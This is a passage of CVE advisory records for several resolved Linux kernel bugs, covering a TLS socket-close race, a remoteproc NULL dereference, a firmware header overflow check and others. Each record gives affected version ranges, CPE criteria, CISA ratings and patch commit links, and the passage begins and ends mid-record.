"version": "9b81d43da15e56ed89f083f326561acdcaf549ce",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/tls.h",
"net/tls/tls_sw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.160",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix race between async notify and socket close\n\nThe submitting thread (one which called recvmsg/sendmsg)\nmay exit as soon as the async crypto handler calls complete()\nso any code past that point risks touching already freed data.\n\nTry to avoid the locking and extra flags altogether.\nHave the main thread hold an extra reference, this way\nwe can depend solely on the atomic ref counter for\nsynchronization.\n\nDon\u0027t futz with reiniting the completion, either, we are now\ntightly controlling when completion fires."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:14.010Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7"
},
{
"url": "https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01"
},
{
"url": "https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a"
},
{
"url": "https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33"
},
{
"url": "https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d"
}
],
"title": "tls: fix race between async notify and socket close",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26583",
"datePublished": "2024-02-21T14:59:11.845Z",
"dateReserved": "2024-02-19T14:20:24.125Z",
"dateUpdated": "2025-05-04T12:54:14.010Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43860 (GCVE-0-2024-43860)
Vulnerability from cvelistv5
Published
2024-08-17 09:24
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
remoteproc: imx_rproc: Skip over memory region when node value is NULL
In imx_rproc_addr_init() "nph = of_count_phandle_with_args()" just counts
number of phandles. But phandles may be empty. So of_parse_phandle() in
the parsing loop (0 < a < nph) may return NULL which is later dereferenced.
Adjust this issue by adding NULL-return check.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[Fixed title to fit within the prescribed 70-75 charcters]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf Version: a0ff4aa6f010801b2a61c203c6e09d01b110fddf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43860",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:55.386082Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:20.012Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/remoteproc/imx_rproc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6884fd0283e0831be153fb8d82d9eda8a55acaaa",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "84beb7738459cac0ff9f8a7c4654b8ff82a702c0",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "6b50462b473fdccdc0dfad73001147e40ff19a66",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "4e13b7c23988c0a13fdca92e94296a3bc2ff9f21",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "9a17cf8b2ce483fa75258bc2cdcf628f24bcf5f8",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "6c9ea3547fad252fe9ae5d3ed7e066e2085bf3a2",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "c877a5f5268d4ab8224b9c9fbce3d746e4e72bc9",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
},
{
"lessThan": "2fa26ca8b786888673689ccc9da6094150939982",
"status": "affected",
"version": "a0ff4aa6f010801b2a61c203c6e09d01b110fddf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/remoteproc/imx_rproc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: imx_rproc: Skip over memory region when node value is NULL\n\nIn imx_rproc_addr_init() \"nph = of_count_phandle_with_args()\" just counts\nnumber of phandles. But phandles may be empty. So of_parse_phandle() in\nthe parsing loop (0 \u003c a \u003c nph) may return NULL which is later dereferenced.\nAdjust this issue by adding NULL-return check.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.\n\n[Fixed title to fit within the prescribed 70-75 charcters]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:53.192Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6884fd0283e0831be153fb8d82d9eda8a55acaaa"
},
{
"url": "https://git.kernel.org/stable/c/84beb7738459cac0ff9f8a7c4654b8ff82a702c0"
},
{
"url": "https://git.kernel.org/stable/c/6b50462b473fdccdc0dfad73001147e40ff19a66"
},
{
"url": "https://git.kernel.org/stable/c/4e13b7c23988c0a13fdca92e94296a3bc2ff9f21"
},
{
"url": "https://git.kernel.org/stable/c/9a17cf8b2ce483fa75258bc2cdcf628f24bcf5f8"
},
{
"url": "https://git.kernel.org/stable/c/6c9ea3547fad252fe9ae5d3ed7e066e2085bf3a2"
},
{
"url": "https://git.kernel.org/stable/c/c877a5f5268d4ab8224b9c9fbce3d746e4e72bc9"
},
{
"url": "https://git.kernel.org/stable/c/2fa26ca8b786888673689ccc9da6094150939982"
}
],
"title": "remoteproc: imx_rproc: Skip over memory region when node value is NULL",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43860",
"datePublished": "2024-08-17T09:24:29.436Z",
"dateReserved": "2024-08-17T09:11:59.279Z",
"dateUpdated": "2025-05-04T09:27:53.192Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41039 (GCVE-0-2024-41039)
Vulnerability from cvelistv5
Published
2024-07-29 14:31
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firmware: cs_dsp: Fix overflow checking of wmfw header
Fix the checking that firmware file buffer is large enough for the
wmfw header, to prevent overrunning the buffer.
The original code tested that the firmware data buffer contained
enough bytes for the sums of the size of the structs
wmfw_header + wmfw_adsp1_sizes + wmfw_footer
But wmfw_adsp1_sizes is only used on ADSP1 firmware. For ADSP2 and
Halo Core the equivalent struct is wmfw_adsp2_sizes, which is
4 bytes longer. So the length check didn't guarantee that there
are enough bytes in the firmware buffer for a header with
wmfw_adsp2_sizes.
This patch splits the length check into three separate parts. Each
of the wmfw_header, wmfw_adsp?_sizes and wmfw_footer are checked
separately before they are used.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.971Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd035f0810b33c2a8792effdb82bf35920221565"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c9877a96e033bf6c6470b3b4f06106d91ace11e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49a79f344d0a17c6a5eef53716cc76fcdbfca9ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3019b86bce16fbb5bc1964f3544d0ce7d0137278"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41039",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:23:20.062334Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:03.086Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fd035f0810b33c2a8792effdb82bf35920221565",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "9c9877a96e033bf6c6470b3b4f06106d91ace11e",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "49a79f344d0a17c6a5eef53716cc76fcdbfca9ba",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "3019b86bce16fbb5bc1964f3544d0ce7d0137278",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: cs_dsp: Fix overflow checking of wmfw header\n\nFix the checking that firmware file buffer is large enough for the\nwmfw header, to prevent overrunning the buffer.\n\nThe original code tested that the firmware data buffer contained\nenough bytes for the sums of the size of the structs\n\n\twmfw_header + wmfw_adsp1_sizes + wmfw_footer\n\nBut wmfw_adsp1_sizes is only used on ADSP1 firmware. For ADSP2 and\nHalo Core the equivalent struct is wmfw_adsp2_sizes, which is\n4 bytes longer. So the length check didn\u0027t guarantee that there\nare enough bytes in the firmware buffer for a header with\nwmfw_adsp2_sizes.\n\nThis patch splits the length check into three separate parts. Each\nof the wmfw_header, wmfw_adsp?_sizes and wmfw_footer are checked\nseparately before they are used."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:41.899Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fd035f0810b33c2a8792effdb82bf35920221565"
},
{
"url": "https://git.kernel.org/stable/c/9c9877a96e033bf6c6470b3b4f06106d91ace11e"
},
{
"url": "https://git.kernel.org/stable/c/49a79f344d0a17c6a5eef53716cc76fcdbfca9ba"
},
{
"url": "https://git.kernel.org/stable/c/3019b86bce16fbb5bc1964f3544d0ce7d0137278"
}
],
"title": "firmware: cs_dsp: Fix overflow checking of wmfw header",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41039",
"datePublished": "2024-07-29T14:31:53.096Z",
"dateReserved": "2024-07-12T12:17:45.621Z",
"dateUpdated": "2025-05-04T09:20:41.899Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43879 (GCVE-0-2024-43879)
Vulnerability from cvelistv5
Published
2024-08-21 00:06
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: cfg80211: handle 2x996 RU allocation in cfg80211_calculate_bitrate_he()
Currently NL80211_RATE_INFO_HE_RU_ALLOC_2x996 is not handled in
cfg80211_calculate_bitrate_he(), leading to below warning:
kernel: invalid HE MCS: bw:6, ru:6
kernel: WARNING: CPU: 0 PID: 2312 at net/wireless/util.c:1501 cfg80211_calculate_bitrate_he+0x22b/0x270 [cfg80211]
Fix it by handling 2x996 RU allocation in the same way as 160 MHz bandwidth.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f Version: c4cbaf7973a794839af080f13748335976cf3f3f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43879",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:54.386411Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:17.515Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/wireless/util.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "45d20a1c54be4f3173862c7b950d4468447814c9",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "b289ebb0516526cb4abae081b7ec29fd4fa1209d",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "2e201b3d162c6c49417c438ffb30b58c9f85769f",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "576c64622649f3ec07e97bac8fec8b8a2ef4d086",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "16ad67e73309db0c20cc2a651992bd01c05e6b27",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "67b5f1054197e4f5553047759c15c1d67d4c8142",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "19eaf4f2f5a981f55a265242ada2bf92b0c742dd",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
},
{
"lessThan": "bcbd771cd5d68c0c52567556097d75f9fc4e7cd6",
"status": "affected",
"version": "c4cbaf7973a794839af080f13748335976cf3f3f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/wireless/util.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: handle 2x996 RU allocation in cfg80211_calculate_bitrate_he()\n\nCurrently NL80211_RATE_INFO_HE_RU_ALLOC_2x996 is not handled in\ncfg80211_calculate_bitrate_he(), leading to below warning:\n\nkernel: invalid HE MCS: bw:6, ru:6\nkernel: WARNING: CPU: 0 PID: 2312 at net/wireless/util.c:1501 cfg80211_calculate_bitrate_he+0x22b/0x270 [cfg80211]\n\nFix it by handling 2x996 RU allocation in the same way as 160 MHz bandwidth."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:24.961Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/45d20a1c54be4f3173862c7b950d4468447814c9"
},
{
"url": "https://git.kernel.org/stable/c/b289ebb0516526cb4abae081b7ec29fd4fa1209d"
},
{
"url": "https://git.kernel.org/stable/c/2e201b3d162c6c49417c438ffb30b58c9f85769f"
},
{
"url": "https://git.kernel.org/stable/c/576c64622649f3ec07e97bac8fec8b8a2ef4d086"
},
{
"url": "https://git.kernel.org/stable/c/16ad67e73309db0c20cc2a651992bd01c05e6b27"
},
{
"url": "https://git.kernel.org/stable/c/67b5f1054197e4f5553047759c15c1d67d4c8142"
},
{
"url": "https://git.kernel.org/stable/c/19eaf4f2f5a981f55a265242ada2bf92b0c742dd"
},
{
"url": "https://git.kernel.org/stable/c/bcbd771cd5d68c0c52567556097d75f9fc4e7cd6"
}
],
"title": "wifi: cfg80211: handle 2x996 RU allocation in cfg80211_calculate_bitrate_he()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43879",
"datePublished": "2024-08-21T00:06:31.488Z",
"dateReserved": "2024-08-17T09:11:59.286Z",
"dateUpdated": "2025-05-04T09:28:24.961Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42322 (GCVE-0-2024-42322)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipvs: properly dereference pe in ip_vs_add_service
Use pe directly to resolve sparse warning:
net/netfilter/ipvs/ip_vs_ctl.c:1471:27: warning: dereference of noderef expression
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 39b9722315364121c6e2524515a6e95d52287549 Version: 39b9722315364121c6e2524515a6e95d52287549 Version: 39b9722315364121c6e2524515a6e95d52287549 Version: 39b9722315364121c6e2524515a6e95d52287549 Version: 39b9722315364121c6e2524515a6e95d52287549 Version: 39b9722315364121c6e2524515a6e95d52287549 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42322",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:22.660389Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:25.691Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/ipvs/ip_vs_ctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "36c997f1e03601475ad0fda0e0f59b7a209e756b",
"status": "affected",
"version": "39b9722315364121c6e2524515a6e95d52287549",
"versionType": "git"
},
{
"lessThan": "211168339657f36f32fb597afd0e3ac82d726119",
"status": "affected",
"version": "39b9722315364121c6e2524515a6e95d52287549",
"versionType": "git"
},
